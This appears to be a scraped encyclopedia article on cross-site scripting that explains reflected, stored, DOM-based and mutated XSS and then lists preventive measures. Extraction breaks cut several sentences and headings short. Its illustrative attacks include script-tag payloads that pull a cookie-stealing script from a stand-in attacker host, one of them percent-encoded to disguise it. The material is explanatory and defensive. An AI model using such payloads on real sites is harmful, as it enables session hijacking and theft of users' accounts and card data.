Background
Security on the web depends on a variety of mechanisms, including an underlying concept of trust known as the same-origin policy. This essentially states that if content from one site (such as ''Types
There is no single, standardized classification of cross-site scripting flaws, but most experts distinguish between at least two primary flavors of XSS flaws: ''non-persistent'' and ''persistent''. Some sources further divide these two groups into ''traditional'' (caused by server-side code flaws) and ''Non-persistent (reflected)
The ''non-persistent'' (or ''reflected'') cross-site scripting vulnerability is by far the most basic type of web vulnerability. These holes show up when the data provided by a web client, most commonly in HTTP query parameters (e.g. HTML form submission), is used immediately by server-side scripts to parse and display a page of results for and to that user, without properly sanitizing the content. Because HTML documents have a flat, serial structure that mixes control statements, formatting, and the actual content, any non-validated user-supplied data included in the resulting page without proper HTML encoding, may lead to markup injection. A classic example of a potential vector is a site search engine: if one searches for a string, the search string will typically be redisplayed verbatim on the result page to indicate what was searched for. If this response does not properlyPersistent (or stored)
The ''persistent'' (or ''stored'') XSS vulnerability is a more devastating variant of a cross-site scripting flaw: it occurs when the data provided by the attacker is saved by the server, and then permanently displayed on "normal" pages returned to other users in the course of regular browsing, without proper HTML escaping. A classic example of this is with online message boards where users are allowed to post HTML formatted messages for other users to read. For example, suppose there is a dating website where members scan the profiles of other members to see if they look interesting. For privacy reasons, this site hides everybody's real name and email. These are kept secret on the server. The only time a member's real name and email are in the browser is when the member is signed in, and they can't see anyone else's. Suppose that Mallory, an attacker, joins the site and wants to figure out the real names of the people she sees on the site. To do so, she writes a script designed to run from other users' browsers when ''they'' visit ''her'' profile. The script then sends a quick message to her own server, which collects this information. To do this, for the question "Describe your Ideal First Date", Mallory gives a short answer (to appear normal), but the text at the end of her answer is her script to steal names and emails. If the script is enclosed inside a
element, it won't be shown on the screen. Then suppose that Bob, a member of the dating site, reaches Mallory's profile, which has her answer to the First Date question. Her script is run automatically by the browser and steals a copy of Bob's real name and email directly from his own machine.
Persistent XSS vulnerabilities can be more significant than other types because an attacker's malicious script is rendered automatically, without the need to individually target victims or lure them to a third-party website. Particularly in the case of social networking sites, the code would be further designed to self-propagate across accounts, creating a type of client-side worm.
The methods of injection can vary a great deal; in some cases, the attacker may not even need to directly interact with the web functionality itself to exploit such a hole. Any data received by the web application (via email, system logs, IM etc.) that can be controlled by an attacker could become an injection vector.
Server-side versus DOM-based vulnerabilities
XSS vulnerabilities were originally found in applications that performed all data processing on the server side. User input (including an XSS vector) would be sent to the server, and then sent back to the user as a web page. The need for an improved user experience resulted in popularity of applications that had a majority of the presentation logic (maybe written in JavaScript) working on the client-side that pulled data, on-demand, from the server using AJAX. As the JavaScript code was also processing user input and rendering it in the web page content, a new sub-class of reflected XSS attacks started to appear that was called ''Self-XSS
Self-XSS is a form of XSS vulnerability that relies onMutated XSS (mXSS)
Mutated XSS happens when the attacker injects something that is seemingly safe but is rewritten and modified by the browser while parsing the markup. This makes it extremely hard to detect or sanitize within the website's application logic. An example is rebalancing unclosed quotation marks or even adding quotation marks to unquoted parameters on parameters to CSS font-family.Exploit examples
Attackers intending to exploit cross-site scripting vulnerabilities must approach each class of vulnerability differently. For each class, a specific attack vector is described here. The names below are technical terms, taken from the Alice-and-Bob cast of characters commonly used in computer security. The Browser Exploitation Framework could be used to attack the web site and the user's local environment.Non-persistent
# Alice often visits a particular website, which is hosted by Bob. Bob's website allows Alice to log in with a username/password pair and stores sensitive data, such as billing information. When a user logs in, the browser keeps an Authorization Cookie, which looks like some random characters, so both computers (client and server) have a record that she's logged in. # Mallory observes that Bob's website contains a reflected XSS vulnerability: ## When she visits the Search page, she inputs a search term in the search box and clicks the submit button. If no results were found, the page will display the term she searched for followed by the words "not found," and the url will behttp://bobssite.org/search?q=her %20search%20term
.
## With a normal search query, like the word "puppies", the page simply displays "puppies not found" and the url is "http://bobssite.org/search ?q=
- which is exploitable behavior.
# Mallory crafts a URL to exploit the vulnerability:
## She makes the URL http://bobssite.org/search ?q=puppies<script%20src="http://mallorysevilsite.com/authstealer.js">
. She could choose to encode the ASCII characters with percent-encoding, such as http://bobssite.org/search ?q=puppies%3Cscript%20src%3D%22http%3A%2F%2Fmallorysevilsite.com%2Fauthstealer.js%22%3E%3C%2Fscript%3E
, so that human readers cannot immediately decipher the malicious URL.
## She sends an e-mail to some unsuspecting members of Bob's site, saying "Check out some cute puppies!"
# Alice gets the e-mail. She loves puppies and clicks on the link. It goes to Bob's website to search, doesn't find anything, and displays "puppies not found" but right in the middle, the script tag runs (it is invisible on the screen) and loads and runs Mallory's program authstealer.js (triggering the XSS attack). Alice forgets about it.
# The authstealer.js program runs in Alice's browser as if it originated from Bob's website. It grabs a copy of Alice's Authorization Cookie and sends it to Mallory's server, where Mallory retrieves it.
# Mallory now puts Alice's Authorization Cookie into her browser as if it were her own. She then goes to Bob's site and is now logged in as Alice.
# Now that she's in, Mallory goes to the Billing section of the website and looks up Alice's credit card number and grabs a copy. Then she goes and changes Alice's account password so Alice can't log in anymore.
# She decides to take it a step further and sends a similarly crafted link to Bob himself, thus gaining administrator privileges to Bob's website.
Several things could have been done to mitigate this attack:
# The search input could have been sanitized, which would include proper encoding checking.
# The web server could be set to redirect invalid requests.
# The web server could detect a simultaneous login and invalidate the sessions.
# The web server could detect a simultaneous login from two different IP addresses and invalidate the sessions.
# The website could display only the last few digits of a previously used credit card.
# The website could require users to enter their passwords again before changing their registration information.
# The website could enact various aspects of the HttpOnly
flag to prevent access from JavaScript.
Persistent attack
# Mallory gets an account on Bob's website. # Mallory observes that Bob's website contains a stored XSS vulnerability: if one goes to the News section and posts a comment, the site will display whatever is entered. If the comment text contains HTML tags, they will be added to the webpage's source; in particular, any script tags will run when the page is loaded. # Mallory reads an article in the News section and enters a comment:I love the puppies in this story! They're so cute!<script src="http://mallorysevilsite.com/authstealer.js ">
# When Alice (or anyone else) loads the page with the comment, Mallory's script tag runs and steals Alice's authorization cookie, sending it to Mallory's secret server for collection.
# Mallory can now Preventive measures
Contextual output encoding/escaping of string input
There are several escaping schemes that can be used depending on where the untrusted string needs to be placed within an HTML document including HTML entity encoding, JavaScript escaping, CSS escaping, and URL (or percent) encoding. Most web applications that do not need to accept rich data can use escaping to largely eliminate the risk of XSS attacks in a fairly straightforward manner. Performing HTML entity encoding only on the five XML significant characters is not always sufficient to prevent many forms of XSS attacks, security encoding libraries are usually easier to use. Some web template systems understand the structure of the HTML they produce and automatically pick an appropriate encoder.Safely validating untrusted HTML input
Many operators of particular web applications (e.g. forums and webmail) allow users to utilize a limited subset of HTML markup. When accepting HTML input from users (say,<b>very</b> large
), output encoding (such as <b>very</b> large
) will not suffice since the user input needs to be rendered as HTML by the browser (so it shows as "very large", instead of "<b>very</b> large"). Stopping an XSS attack when accepting HTML input from users is much more complex in this situation. Untrusted HTML input must be run through an HTML sanitization engine to ensure that it does not contain XSS code.
Many validations rely on parsing out (blacklisting) specific "at risk" HTML tags such as the following